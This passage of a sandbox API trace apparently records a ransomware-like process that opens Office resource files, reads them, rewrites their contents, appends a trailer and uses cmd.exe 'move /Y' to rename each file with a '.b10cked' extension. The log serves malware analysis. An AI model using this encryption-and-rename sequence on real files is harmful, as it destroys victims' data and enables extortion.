dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x25f60 [0157.663] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0157.679] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0157.721] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0157.738] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x25f60 [0157.738] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0157.738] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0157.739] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0157.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPINTL.REST.trx_dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0157.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPINTL.REST.trx_dll", cchWideChar=19, lpMultiByteStr=0x1328744, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPINTL.REST.trx_dll", lpUsedDefaultChar=0x0) returned 19 [0157.744] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x45f60 [0157.744] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0157.744] CloseHandle (hObject=0x114) returned 1 [0157.747] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~2.TRX") returned 0x3c [0157.748] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0157.748] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.REST.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.REST.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0x324, dwThreadId=0xf70)) returned 1 [0157.750] CloseHandle (hObject=0x1b4) returned 1 [0157.750] CloseHandle (hObject=0x114) returned 1 [0157.750] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0157.750] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0157.750] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0157.750] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0157.751] ReleaseMutex (hMutex=0xf8) returned 1 [0157.751] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0157.751] ReleaseMutex (hMutex=0xf8) returned 1 [0157.751] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0157.751] ReleaseMutex (hMutex=0xf8) returned 1 [0157.751] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0157.751] ReleaseMutex (hMutex=0xf8) returned 1 [0157.751] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\pub6intl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0157.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a360 [0157.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.846] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21463483438) returned 1 [0157.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a360 [0157.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a360 [0157.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0157.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x1a360 [0157.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0157.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a360 [0157.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a360 [0157.846] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.847] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.847] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a360 [0157.847] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.847] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.847] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a360 [0157.847] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.847] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.847] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a360 [0157.847] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.847] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.847] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a360 [0157.847] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.847] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x19e78 [0157.847] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0157.849] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0157.849] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0157.849] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x1a360 [0157.849] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0157.849] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0157.849] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0157.849] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x1a360 [0157.849] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0157.849] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0157.849] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xd1af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xd1af, lpOverlapped=0x0) returned 1 [0157.896] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0157.896] WriteFile (in: hFile=0x114, lpBuffer=0x125a3a8*, nNumberOfBytesToWrite=0xd1af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x125a3a8*, lpNumberOfBytesWritten=0x12ec1c*=0xd1af, lpOverlapped=0x0) returned 1 [0157.896] SetFilePointer (in: hFile=0x114, lDistanceToMove=-53679, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xd1b1 [0157.896] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xd1af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xd1af, lpOverlapped=0x0) returned 1 [0157.897] SetFilePointer (in: hFile=0x114, lDistanceToMove=-53679, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xd1b1 [0157.897] WriteFile (in: hFile=0x114, lpBuffer=0x125a3a8*, nNumberOfBytesToWrite=0xd1af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x125a3a8*, lpNumberOfBytesWritten=0x12ec1c*=0xd1af, lpOverlapped=0x0) returned 1 [0157.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUB6INTL.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0157.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUB6INTL.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x1328744, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUB6INTL.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 20 [0157.902] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x1a360 [0157.902] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0157.902] CloseHandle (hObject=0x114) returned 1 [0157.904] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~1.TRX") returned 0x3c [0157.904] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0157.905] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0xe1c, dwThreadId=0xe70)) returned 1 [0157.926] CloseHandle (hObject=0x1b4) returned 1 [0157.926] CloseHandle (hObject=0x114) returned 1 [0157.926] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0157.926] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0157.926] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0157.926] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0157.926] ReleaseMutex (hMutex=0xf8) returned 1 [0157.927] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0157.927] ReleaseMutex (hMutex=0xf8) returned 1 [0157.927] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0157.927] ReleaseMutex (hMutex=0xf8) returned 1 [0157.927] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0157.927] ReleaseMutex (hMutex=0xf8) returned 1 [0157.927] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\pub6intl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0158.064] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.064] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8e160 [0158.064] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.064] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21485345998) returned 1 [0158.064] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.064] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8e160 [0158.064] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.065] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.065] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8e160 [0158.065] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.065] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.065] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8e160 [0158.065] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.065] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.065] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8e160 [0158.065] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.065] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.065] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8e160 [0158.065] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.065] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.065] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8e160 [0158.066] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.066] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.066] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8e160 [0158.066] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.066] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.066] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8e160 [0158.066] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.066] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 